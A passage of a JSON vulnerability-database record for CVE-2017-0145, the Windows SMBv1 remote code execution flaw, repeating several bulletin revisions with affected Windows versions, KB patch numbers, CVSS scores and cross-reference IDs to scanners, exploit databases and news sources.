"msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service 
Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 
Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB4014077", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 
(Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based 
Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, 
{"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB4014077", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 
(Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 